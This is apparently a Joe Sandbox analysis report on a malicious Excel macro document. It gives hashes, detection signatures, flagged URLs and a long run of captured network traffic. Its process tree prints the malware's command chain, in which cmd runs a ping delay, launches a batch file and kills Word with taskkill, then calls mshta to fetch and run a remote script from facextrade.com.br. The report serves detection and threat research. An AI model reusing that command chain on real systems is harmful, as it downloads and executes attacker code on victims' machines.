Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls
Analysis ID:684675
MD5:5081a754e710f34178dee80e5b1f15b4
SHA1:8ce6a3a89c9ede6a40eee5d0b0488bff2098ca01
SHA256:00f54cf5df13e3b9549f32fd39f986fc083559558d552cc0708e7a48e5f5bafe
Tags:xlsx
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Installs a global mouse hook
Uses taskkill to terminate processes
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5228 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 4716 cmdline: cmd /c ping -n 8 127.0.0.1 & %public%\Outlook.bat exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 4000 cmdline: ping -n 8 127.0.0.1 MD5: 70C24A306F768936563ABDADB9CA9108)
      • cmd.exe (PID: 4188 cmdline: cmd /c start /min taskkill /f /im WINWORD.EXE MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • taskkill.exe (PID: 576 cmdline: taskkill /f /im WINWORD.EXE MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
          • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • mshta.exe (PID: 5612 cmdline: mshta http://facextrade.com.br/wp-includes/certificates/4.txt MD5: 7083239CE743FDB68DFC933B7308E80A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsVirustotal: Detection: 48%Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsMetadefender: Detection: 29%Perma Link
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsReversingLabs: Detection: 41%
Antivirus / Scanner detection for submitted sample
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsAvira: detected
Antivirus detection for URL or domain
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.03~Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6dAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.33.0.68SAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2tsAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0s./kAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jssQAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-contAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.pngsYAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/wp-embed.min.js?ver=4.9.20=BAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2dAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png.3vAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.200Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1Avira URL Cloud: Label: malware
Source: https://facextrade.com.br/#contatosEAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0yAvira URL Cloud: Label: malware
Source: https://facextrade.com.br/feed/Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.68Avira URL Cloud: Label: malware
Source: https://facextrade.com.br/#contatos=Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.jsptAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3kpAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txtyle.cssE5Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/images/up-arrow.pngAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txt5jAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js-lAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/4.txtmshtaAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/main-style.cssets/css/logo-slider-wp-public.csAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0er=2.6.0yAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/css/banner-rotator.css?ver=4.9.20B7Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/wlwmanifest.xml4Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6?veLMEMAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2s#Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0z6Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/bootstrap/css/responsive.cssqAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.31-Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2R6Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0gAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/bannerrotator/js/jquery.banner-rotator.js?ver=4.9.20r=4.Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js?ver=1.0.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/js/swfobject.js?ver=2.2-20120417Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0Avira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-includes/certificates/privacy-policyAvira URL Cloud: Label: malware
Source: http://facextrade.com.br/wp-content/themes/theme51253/js/custom-script.js?ver=1.0ver=5.0.3hAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: facextrade.com.brVirustotal: Detection: 5%Perma Link
Machine Learning detection for sample
Source: SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.3:49750 version: TLS 1.2

Software Vulnerabilities

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\Outlook.batJump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
Source: global trafficDNS query: name: facextrade.com.br
Source: global trafficDNS query: name: netdna.bootstrapcdn.com
Source: global trafficDNS query: name: translate.google.com
Source: global trafficDNS query: name: storage.ie6countdown.com
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 104.18.10.207:80
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 104.18.10.207:80
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 104.18.10.207:80
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 104.18.10.207:80 -> 192.168.2.3:49745
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 104.18.10.207:80
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 104.18.10.207:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49743 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49749 -> 142.250.181.238:80
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.3:49749
Source: global trafficTCP traffic: 192.168.2.3:49749 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.3:49749 -> 142.250.181.238:80
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.3:49749
Source: global trafficTCP traffic: 142.250.181.238:80 -> 192.168.2.3:49749
Source: global trafficTCP traffic: 192.168.2.3:49749 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49743
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49748
Source: global trafficTCP traffic: 192.168.2.3:49748 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.3:49744
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49744 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.3:49750
